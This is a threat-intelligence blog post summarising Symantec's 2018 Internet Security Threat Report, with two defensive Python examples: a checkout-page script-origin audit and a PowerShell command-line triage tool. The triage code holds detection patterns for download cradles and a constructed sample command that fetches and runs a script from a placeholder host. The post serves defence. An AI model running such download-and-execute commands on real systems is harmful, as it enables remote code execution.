5 Key Takeaways From 12 Months in Cyber Security

Check out some of the key findings from Symantec’s recently-released Internet Security Threat Report (ISTR).

Threat Intel
Feb 28, 2019


Read Symantec’s Internet Security Threat Report here.

Formjacking is the on-trend attack for cyber criminals

Formjacking — the use of malicious JavaScript code to steal credit card details and other information from payment forms on the checkout web pages of eCommerce sites — was one of the biggest cyber security trends of the last 12 months.

Symantec data found that an average of more than 4,800 unique websites were compromised with formjacking code every single month in 2018. To give that some context, and show why formjacking is so appealing for cyber criminals, the details of a single credit card could fetch up to $45 on underground markets, so even if just 10 credit cards were skimmed from each compromised website every month, this could result in an average monthly yield of up to $2.2 million for those involved.

Formjacking can be quite a subtle attack — the website will generally appear and work as normal for consumers, with no obvious signs that their payment card data is being slurped up by formjacking criminals. It’s possible formjacking code won’t be discovered on a website until the business receives reports of numerous customers’ payment cards having been skimmed. This means formjacking code could potentially be on a website slurping up data for a long time before it is removed.

We blocked more than a quarter of 2018’s total formjacking attempts in the last two months of the year — we blocked just over 3.7 million formjacking attempts in 2018 in total, but more than one million of those blocks occurred in November and December. No doubt this was partly because attackers were trying to take advantage of the busy holiday shopping season, but it also indicates that formjacking is an area of increasing interest to cyber criminals.

Cryptojacking is down but not out

Cryptojacking was one of the biggest stories on the cyber security landscape at the end of 2017 and the beginning of 2018. In January and February 2018, Symantec technologies were blocking more than 8 million cryptojacking events each month. This high level of activity was linked to the high value of cryptocurrencies at that time — Bitcoin had broken records in December 2017 when the value of one bitcoin exceeded $19,000, while the value of one Monero coin, which is what is primarily mined by cryptojacking criminals, hovered at around $400.

Cryptojacking is when cyber criminals surreptitiously run coinminers on victims’ devices and use their central processing unit (CPU) power to mine cryptocurrencies. This activity is mostly carried out within web browsers and is implemented using scripting languages: visitors to a web page that has been infected with cryptojacking code will have their computing power used to mine cryptocurrency. Users often do not notice, and that stealth is one of the key appeals of cryptojacking for those behind it.

Cryptocurrency values decreased sharply during 2018, reducing the profitability and the appeal of cryptojacking. However, while the value of Monero dropped 90 percent, the rate of cryptojacking fell by significantly less than that — 52 percent — and Symantec still blocked 3.5 million cryptojacking events in December 2018. While interest in cryptocurrencies has waned since the beginning of 2018, activity in this area remained significant.
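Both formjacking and browser cryptojacking depend on script running on a page that the site owner never intended to serve, so one practical defensive check is to compare every origin that serves script on a checkout page against an allowlist and to enforce that allowlist with a Content-Security-Policy. The code below is an added example written for this post, not Symantec's or the ISTR's; the checkout HTML, the hostnames and the allowlist are constructed assumptions.

```python
# Added example (not Symantec's code): audit which origins serve script on a
# checkout page against an allowlist, and emit a matching CSP header.
# The HTML, hostnames and allowlist below are constructed for illustration.
from html.parser import HTMLParser
from urllib.parse import urlparse

class _ScriptCollector(HTMLParser):
    """Collects the src of every <script> tag and counts inline scripts."""
    def __init__(self):
        super().__init__()
        self.external, self.inline = [], 0

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self.inline += 1

def script_origins(html):
    """Return (origins serving external script, inline script count).
    Relative and scheme-relative URLs count as the page's own origin."""
    p = _ScriptCollector()
    p.feed(html)
    origins = []
    for u in map(urlparse, p.external):
        origins.append(f"{u.scheme or 'https'}://{u.netloc}" if u.netloc else "'self'")
    return origins, p.inline

def unexpected_origins(html, allowed):
    """Sorted, deduplicated origins that serve script but are not allowlisted."""
    return sorted({o for o in script_origins(html)[0] if o not in allowed})

def build_csp(allowed):
    """CSP that only runs script from allowed origins and only lets fetch/XHR
    and form posts reach the site itself, limiting where skimmed data can go."""
    return (f"default-src 'self'; script-src {' '.join(sorted(allowed))}; "
            "connect-src 'self'; form-action 'self'")

# Constructed checkout page: the shop's own script, its payment provider's
# script, and a third-party script that was never part of the site's build.
SAMPLE_HTML = """<form action="/pay" method="post"><input name="card"></form>
<script src="/static/checkout.js"></script>
<script src="https://js.example-psp.test/v1/card.js"></script>
<script src="//cdn.static-assets.test/jquery.min.js"></script>
<script>console.log("inline");</script>"""
ALLOWED = {"'self'", "https://js.example-psp.test"}
```

Running `unexpected_origins(SAMPLE_HTML, ALLOWED)` flags the unlisted CDN origin; the inline script count is worth reviewing separately, since an injected inline skimmer has no origin to compare.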

Targeted attackers are out for destruction

Targeted attack groups continued to have a significant impact on the cyber security threat landscape and posed a significant threat to organizations during 2018. One of the more interesting developments in the area of targeted attacks in 2018 was the increase in potentially disruptive attacks, with the number of targeted attack groups known to use destructive malware increasing by 25 percent.

Another major development on the targeted attack landscape in 2018 was the major increase in indictments issued by the U.S. against people alleged to be involved in state-sponsored espionage. Forty-nine indictments were issued in 2018, a stark increase from four in 2017 and five in 2016.

Ransomware — down overall but focus on enterprises

Overall ransomware activity fell in 2018, the first time activity in this area has fallen since 2013. The overall number of ransomware infections fell by 20 percent; however, enterprise ransomware infections increased by 12 percent. This is likely because the chief ransomware distribution method in 2018 was email, and enterprises tend to be more affected by email-based attacks because email remains a primary communication tool for organizations. Ransomware has also become a less effective tool to use against consumers, given that many consumers now exclusively use mobile devices and have much of their data backed up in the cloud.

Despite the drop, overall ransomware activity remained high, and it is important to note that Symantec may be blocking ransomware earlier in the infection process, either via email protection or using technologies such as behavioral analysis and machine learning. Threats blocked at this earlier stage will not register as ransomware, so the figures could be masking some ransomware activity.

Living off the land

Living off the land is a trend that has been increasingly adopted by cyber criminals in recent times, with a significant increase in certain activity in this area observed in 2018. PowerShell is now commonly used in both cyber crime and targeted attacks — with a 1,000 percent increase in malicious PowerShell scripts blocked on the endpoint in 2018. However, while Symantec blocks 115,000 malicious PowerShell scripts every month, this accounts for less than one percent of overall PowerShell usage.
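The fact that malicious scripts are under one percent of PowerShell usage is exactly what makes them hard to pick out, so a defender needs a triage pass over command lines from process or script-block logs. The following is an added example written for this post, not Symantec's tooling: it scores invocations on flags that routine admin use rarely combines, and decodes -EncodedCommand payloads (UTF-16LE base64) so indicators hidden inside them still fire. The sample log lines, the placeholder host and the indicator set are constructed assumptions.

```python
# Added example (not Symantec's code): triage PowerShell command lines so the
# rare malicious invocations stand out from routine admin use. Log lines,
# hostnames and the indicator set are constructed for illustration.
import base64
import re

# Flags and cmdlets that legitimate interactive/admin use rarely combines.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "encoded_command": re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "policy_bypass": re.compile(r"-e(?:p|x|xecutionpolicy)\s+bypass", re.I),
    "download_cradle": re.compile(r"DownloadString|Invoke-WebRequest|\biwr\b", re.I),
    "invoke_expression": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
}
ENC_ARG = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmdline):
    """Return the script behind -EncodedCommand (UTF-16LE base64), or ''."""
    m = ENC_ARG.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def triage(cmdline):
    """Return the indicator names that match the command line, including
    those that only appear after decoding an -EncodedCommand payload."""
    text = cmdline + " " + decode_encoded_command(cmdline)
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))


# Constructed samples: routine admin use, then an invocation that hides its
# window, bypasses execution policy and base64-encodes the script it runs.
BENIGN = "powershell.exe -Command Get-Service -Name Spooler"
ENCODED = base64.b64encode(
    "Invoke-WebRequest http://placeholder.invalid/s.ps1 | IEX".encode("utf-16-le")
).decode()
SUSPICIOUS = f"powershell.exe -nop -w hidden -ep bypass -enc {ENCODED}"
```

Score by the number of indicators rather than on any single one: a lone `-EncodedCommand` is common in legitimate automation, while hidden window plus policy bypass plus an encoded download is not.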

Elsewhere, Microsoft Office files accounted for 48 percent of all malicious email attachments in 2018, an increase from 5 percent in 2017. Macros in these Office files were a preferred method used to propagate malicious payloads by cyber crime groups in 2018, while some groups also used malicious XML files and Office files with DDE payloads.

Check out the Security Response blog and follow Threat Intel on Twitter to keep up-to-date with the latest happenings in the world of threat intelligence and cyber security. Click here to read the ISTR.



Threat Intel

Symantec’s Threat Hunter team brings you the latest threat intelligence from the IT security world.